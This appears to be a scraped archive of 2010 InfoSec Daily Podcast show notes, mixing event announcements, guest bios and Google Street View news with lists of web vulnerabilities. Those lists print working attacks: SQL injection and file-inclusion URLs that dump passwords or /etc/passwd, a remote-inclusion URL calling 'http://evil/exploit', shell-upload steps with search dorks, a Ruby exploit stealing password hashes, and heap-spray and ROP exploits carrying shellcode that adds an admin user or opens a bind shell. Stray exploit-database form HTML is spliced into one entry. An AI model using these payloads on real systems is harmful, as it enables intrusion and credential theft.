InfoSec Daily Podcast

 
ISD Podcast Episode 120 for April 30, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com.  Use the Discount Code: isdpodcast for a $300 discount.

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).  Use the Discount Code: isdpod15 for a 15% discount.
  

Atlanta ISSA:

• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

North Alabama ISSA:

• Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL.  Event is open to ISSA members at a discounted price ($35 full price is $50).
• For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:
Webhosting services:WebSpeedway

Interview with Jason Lawrence.  Jason has been in the world of Security since 1996, supporting, designing  and integrating Microsoft environments and diverse security infrastructures. He holds numerous industry certifications such as CISSP, CISA, GCFA and  CEH. He has worked for a large Healthcare Provider in Israel as team lead in supporting and maintaining the organization’s system and security infrastructure. Currently he works for IBM Internet Security Systems as a Senior Support Engineer for the ISS product portfolio. Jason has also been involved with the ISSA for the past 6 years and currently is the Metro Atlanta Chapter’s Director of Communication. In his free time he mentors the SANS Forensics 508: Computer Forensic Investigations and Incident Response course.

InfoSec Daily Podcast

 
ISD Podcast Episode 119 for April 29, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

North Alabama ISSA:

• Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL.  Event is open to ISSA members at a discounted price ($35 full price is $50).
• For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class).  So apparently, there’s been some issues with the class RSVP’s.  As a result, they are working on either responding to the RSVP’s, getting a bigger location or as a last result they may have to just say sorry to those that don’t get in.

Friends of the Podcast:

Webhosting services:WebSpeedway

Interview with Scott Moulton.  Scott Moulton was the first person arrested for Port Scanning in January of 2000. During the defense, Scott found he had to train his lawyers on the technical aspects of computers in order to defend himself. This began his forensic computer career with a speciality in rebuilding hard drives for investigation purposes. Scott is the President at Forensic Strategy Services, LLC and the owner at My Hard Drive Died.  Scott has presented at Shmoocon, OuterZ0ne, DEF CON, Toorcon as well as an active consistent speaker with the DEF CON 404 Local Chapter.

InfoSec Daily Podcast

 
ISD Podcast Episode 118 for April 28, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

North Alabama ISSA:

• Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL.  Event is open to ISSA members at a discounted price ($35 full price is $50).
• For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Interview with L. Taylor Banks who is the owner at KnowThreat and Administrator and PoC of the Atlanta DEF CON group DC404.  Taylor has been a speaker at DEF CON, Black Hat, ShmooCon, LayerOne, and numerous private events.  If you are interested in learning about computing, be sure to checkout Taylor’s event Zero to Cloud in 48 Hours.

InfoSec Daily Podcast

 
ISD Podcast Episode 117 for April 27, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

North Alabama ISSA:

• Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL.  Event is open to ISSA members at a discounted price ($35 full price is $50).
• For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Interview with Everett Washington Way Professional Services.  Everett specializes in Security program building, with specific focus on Security Assessments and Audits.  He has been instrumental in implementing Vulnerability and Risk Management Solutions.  We get Everett to talk to us about his experiences and recommendations for building a successful Information Security program.

InfoSec Daily Podcast

 
ISD Podcast Episode 116 for April 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

North Alabama ISSA:

• Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL.  Event is open to ISSA members at a discounted price ($35 full price is $50).
• For more information please visit the North Alabama ISSA’s web site at: http://northalabama.issa.org/

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. Mp3 Online Id Tag Editor is subject to a Remote File Inclusion (RFI) vulnerability.  Proof of Concept URLs are available: http://www.sample.com/mp3/velid3/module.archive.gzip.php?determined_format[include]=http://evil/exploit?
2. PhpMesFilms is subject to a SQL Injection vulnerability. Version 1.8 is impacted, though others may be as well.  Proof of Concept URLs are available: http://www.sample.com/phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10–
3. Multi-Mirror is subject to a Remote Upload vulnerability. Proof of Concept is available:
   Step 1 – http://www.sample.com/Multi-Mirror/ (Select Mirrors 2 upload file and select file 2 upload)
   Step 2 – http://www.sample.com/Multi-Mirror/temp_files (After Upload )
4. Mihalism Multi Host is subject to a Upload vulnerability. Version 4.0.0 is impacted, though others may be as well.  Google Dork “inurl: Mihalis”  Proof of Concept is available:
   Step 1 – http://www.sample.com/Mihalis/index.php (Use Tamper Data)
   Step 2 – http://www.sample.com/Mihalis/images/02j3gul0lkay3ggoz5ci.php (File Name)
5. Magic Uploader Mini is subject to a Upload vulnerability. Google Dork “inurl: miniuploader”  Proof of Concept is available:
   Step 1 – http://www.sample.com/miniuploader/index.php (Use Tamper Data)
   Step 2 – http://www.sample.com/miniuploader/uploads/ (File Name)
6. Almnzm is subject to a SQL Injection vulnerability. Version older than 2.1 are impacted, though others may be as well.  Example URL is available:
   http://www.sample.com/index.php?a=pages&id=3′ and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers–%20
7. Bild Flirt is subject to a SQL Injection vulnerability. Version older than 1.0 are impacted, though others may be as well.  Exploit code is available:
   #!/usr/bin/ruby
   #4004-security-project.com
   #Discovered and vulnerability by Easy Laster
   print ”
   #########################################################
   #                   4004-Security-Project               #
   #########################################################
   #        Bild Flirt <= version 1.0 SQL Injection        #
   #                          Exploit                      #
   #                  Using Host+Path+userid               #
   #                 www.demo.de /bildflirt/ 1             #
   #                         Easy Laster                   #
   #########################################################
   ”
   require ‘net/http’
   print “#########################################################”
   print “\nEnter host name (site.com)->”
   host=gets.chomp
   print “#########################################################”
   print “\nEnter script path (/forum/)->”
   path=gets.chomp
   print “#########################################################”
   print “\nEnter script path (userid)->”
   userid=gets.chomp
   print “#########################################################”
   begin
   dir = “index.php?id=999999999+and+1=0+union+select+concat(0×23,0×23,0×23,0×23,0×23,name,0×23,0×23,0×23,0×23,0×23)+from+bildf_user+where+user_id=”+ userid +”–”
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print “\nThe Username is  -> “+(/#####(.+)#####/).match(resp.body)[1]
   dir = “index.php?id=999999999+and+1=0+union+select+concat(0×23,0×23,0×23,0×23,0×23,passwort,0×23,0×23,0×23,0×23,0×23)+from+bildf_user+where+user_id=”+ userid +”–”
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print “\nMD5 Password Hash is -> “+(/#####(.+)#####/).match(resp.body)[1]
   print “\n#########################################################”
   rescue
   print “\nExploit failed”
   end
8. YUI Images Script is subject to a Shell Upload vulnerability. Version 1.0 is impacted, though others may be as well. Google Dork “inurl: YUI-upload”.  Example URLs are available:
   http://www.sample.com/YUI-upload/html (Upload shell .php.giff)
   http://www.sample.com/YUI-upload/html/files/ (Your Shell.php.giff)
9. Opentel Openmairie tel is subject to a Local File Inclusion (LFI) vulnerability. Version 1.02 is impacted, though others may be as well. Google Dork “inurl: scr/soustab”.  Example URL is available:

   http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00

10. Openstock Facture is subject to a Local File Inclusion (LFI) vulnerability. Version 2.02 is impacted, though others may be as well. Google Dork “inurl: scr/soustab”.  Example URL is available:

    http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00

11. iMesh is subject to a Buffer Overflow vulnerability. Versions older than 7.1.0.x are impacted, though others may be as well. Exploit code is available:
    <html>
    <object classid=’clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9′ id=’IMWebControl’ /></object>
    <SCRIPT>
    //add su one, user: sun pass: tzu
    shellcode = unescape(“%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u
    426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570″);
    bigblock  = unescape(“%u9090%u9090″);
    headersize = 20;
    slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0×40000) block = block+block+fillblock;
    memory = new Array();
    for (i=0;i<77;i++){memory[i] = block+shellcode}
    bigblock  = unescape(“%u0707%u0707″);
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0×40000) block = block+block+fillblock;
    for (i=77;i<144;i++){memory[i] = block+shellcode}
    bigblock  = unescape(“%u0909%u0909″);
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0×40000) block = block+block+fillblock;
    for (i=144;i<500;i++){memory[i] = block+shellcode}
    </script>
    <script language=’vbscript’>
    puf=218959117 ‘set ecx to 0x0d0d0d0d
    IMWebControl.SetHandler puf
    puf=”"
    IMWebControl.ProcessRequestEx puf
    </script>
    </html>

    # milw0rm.com [2007-12-18]
    </textarea><br>

    Text File Extension:<br><input size=5 value=”html”> <i>used at downloading</i><br><br>

    </span>

    <span id=’pdf’ style=’display: none’>

    Attached File Name:<br><input name=’filename’ size=20 value=”> <i>file from ‘papers’ dir</i><br><br>

    </span>

    Application File Name:<br><input type=”text” size=25 value=”iMeshV7.exe”><br>

    MD5 of Application File:<br><input size=25 name=”md5″ value=”0e0681816776e98c78432fcb4cd6f1cf”><br><br>

    <!–CVE:<br><input size=25 value=”"><br><br>–>

    Verified: <input type=”checkbox” value=1 checked ><br><br>

    <input type=’submit’ value=”Save”>

    </form>

    <br>

    <h3>Codes of this record</h3>

    <table border=1>

    <tr><td>#<td>ID<td>OSVDB<td>CVE<td> <td> </tr>

    </table>

    <a href=’?action=code_edit&mw_id=9477&back=9477&page=0&id_filter=9477&desc_filter=&platform_filter=&type_filter=&port_filter=&author_filter=&duplicates_filter=&verified_filter=&osvdb_filter=&cve_filter=’>Add codes</a>

    <br>

Stories of Interest:
News item 1:  http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/

Google’s roving Street View spycam may blur your face, but it’s got your number. The Street View service is under fire in Germany for scanning private WLAN networks, and recording users’ unique Mac (Media Access Control) addresses, as the car trundles along.

Germany’s Federal Commissioner for Data Protection Peter Schaar says he’s “horrified” by the discovery.

“I am appalled… I call upon Google to delete previously unlawfully collected personal data on the wireless network immediately and stop the rides for Street View,” according to German broadcaster ARD.

Spooks have long desired the ability to cross reference the Mac address of a user’s connection with their real identity and virtual identity, such as their Gmail or Facebook account.

Other companies have logged broadcasting WLAN networks and published the information. By contrast Google has not published the WLAN map, or Street View in Germany; Google hopes to launch the service by the end of the year.
At least since 2008 is publicly known that record companies like Skyhook equip test vehicles with Wi-Fi. The company offers its radio signals and mobile phone data for years with software developers.  The company has mapped 80 million worldwide according to their own data Wi-Fi locations.  To that point, the first iPhone used the Skyhook technology to determine the approximate location of the phone using a number of wireless signals. The major difference here is that Skyhook technology is not made public.

News item 2:http://www.guardian.co.uk/technology/2010/apr/20/google-google-street-view

Google has hit out at state attempts to clamp down on the internet by revealing governments’ requests to remove data from the web and get information about users.

Tonight it released a web page with a map showing country by country where it has had government requests or court orders to remove content from the YouTube video service or its search results, or to provide details about users of its services.

The release of the tool, announced on its official blog, comes as it has had to counter complaints from data protection authorities in 10 countries, including the UK, that its Street View product, which provides pictures of public streets, and its ad-hoc social networking service Buzz “were launched without due consideration of privacy and data protection laws” and that Buzz in particular “betrayed a disappointing disregard for fundamental privacy norms”.

Details provided by Google cover requests between 1 July and 31 December 2009, and show that in the UK there were 1,166 requests for data about users and 59 requests to remove web pages in Google’s services such as YouTube, or from its search results for the web. It complied with 45, or 76%, of the 59 requests, of which 43 were about YouTube videos. It does not specify which government agency – such as the police or others – made the request.

InfoSec Daily Podcast

 
ISD Podcast Episode 115 for April 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo  April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. Mp3 MuZik is subject to a Data Base Download vulnerability. Proof of Concept URLs are available:

   http://www.sample.com/Mp3/dbaze/

   http://www.sample.com/Mp3/admin

2. Games Script (Galore) is subject to a Backup Dump vulnerability. Proof of Concept URLs are available:
   http://www.sample.com/Games Script (Galore)/admincp/backup/
   http://www.sample.com/Games Script (Galore)/admincp/
3. My School Script is subject to a Backup Dump vulnerability. Proof of Concept URLs are available:

   http://www.sample.com/My.School/odevsitesi.mdb

   http://www.sample.com/My.School/sayac.mdb

   http://www.sample.com/My.School/admin.asp

4. PHP 6.0 Dev str_transliterate() is subject to a Buffer Overflow vulnerability. Proof of Concept code is available:
   <?php
   /*
   04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
   Tested on Windows 2008 SP1 DEP alwayson
   Matteo Memelli aka ryujin ( AT ) offsec.com
   original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)

   Thx to muts and Elwood for helping

   Bruteforce script is attached in base64 format.

   root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
   (*) Php6 str_transliterate() bof || ryujin # offsec.com
   (*) Bruteforcing WPM ret address…
   (+) Trying base address 0×78000000
   (+) Trying base address 0×77000000
   (+) Trying base address 0×76000000
   (+) Trying base address 0×75000000
   Microsoft Windows [Version 6.0.6001]
   Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

   C:\wamp\bin\apache\Apache2.2.11>whoami
   whoami
   nt authority\system
   */

   error_reporting(0);

   $base_s = $_GET['pos_s'];
   $base_e = $_GET['pos_e'];
   $off_s  = $_GET['off_s'];
   $off_e  = $_GET['off_e'];

   if(ini_get_bool(‘unicode.semantics’)) {
   $buff    = str_repeat(“\u4141″, 32);
   $tbp     = “\u2650\u6EE5″; // 6EE52650 ADDRESS TO BE PATCHED BY WPM
   $ptw     = “\u2FE0\u6EE5″; // 6EE52FE0 POINTER FOR WRITTEN BYTES
   $ret     = “\u2660\u6EE5″; // 6EE52660 RET AFTER WPM
   $wpmargs = $ret.”\uFFFF\uFFFF”.$tbp.”\uFFFF\uFFFF\uFFFF\uFFFF”.$ptw; // WPM ARGS
   $garbage     = “\$wpm = \”\\u”.strtoupper(sprintf(“%02s”, dechex($off_s))).strtoupper(sprintf(“%02s”, dechex($off_e))).
   “\\u”.strtoupper(sprintf(“%02s”, dechex($base_s))).strtoupper(sprintf(“%02s”, dechex($base_e))).”\”;”;
   eval($garbage);
   $nops    = str_repeat(“\u9090″, 41);

   // TH || ROP -> Try Harder or Rest On Pain
   // GETTING SHELLCODE ABSOLUTE ADDRESS
   $rop  = “\u40dd\u6FF2″;   // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN             6FF240DD
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
   $rop .= “\u5DD4\u6EE6″;   // POP ECX/RETN                                         6EE65DD4
   $rop .= “\uFDBC\uFFFF”;   // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
   $rop .= “\u222B\u6EED”;   // ADD EAX,ECX/POP EBX/POP EBP/RETN                     6EED222B
   $rop .= “\u2650\u6EE5″;   // JUNK POPPED IN EBP (RET TO SHELLCODE)
   $rop .= “\u2650\u6EE5″;   // JUNK POPPED IN EBP (RET TO SHELLCODE)

   // PATCHING BUFFER ADDY ARG FOR WPM
   $rop .= “\u1C13\u6EE6″;   // ADD DWORD PTR DS:[EAX],EAX/RETN                      6EE61C13

   // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
   $rop .= “\uE94E\u6EE6″;   // MOV EDX,ECX/POP EBP/RETN                             6EE6E94E
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
   $rop .= “\u5DD4\u6EE6″;   // POP ECX/RETN                                         6EE65DD4
   $rop .= “\uFF5C\uFFFF”;   // VALUE TO BE POPPED IN ECX                            FFFFFF5C
   $rop .= “\uE94C\u6EE6″;   // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN                 6EE6E94C
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP

   // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
   $rop .= “\u0C54\u6EE7″;   // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN            6EE70C54
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP

   // REALIGNING ESP TO WPM AND RETURNING TO IT
   $rop .= “\u8640\u6EE6″;   // ADD EAX,-30/POP EBP/RETN                             6EE68640
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
   $rop .= “\u29F1\u6EE6″;   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
   $rop .= “\u29F1\u6EE6″;   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
   $rop .= “\u4242\u4242″;   // JUNK POPPED IN EBP
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u10AD\u6FC3″;   // INC EAX/RETN                                         6FC310AD
   $rop .= “\u2C63\u6FC5″;   // XCHG EAX,ESP/RETN                                    6FC52C63

   // unicode bind shellcode port 4444, 318 bytes
   $sh = “\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b”.
   “\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824″.
   “\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db”.
   “\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233″.
   “\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02″.
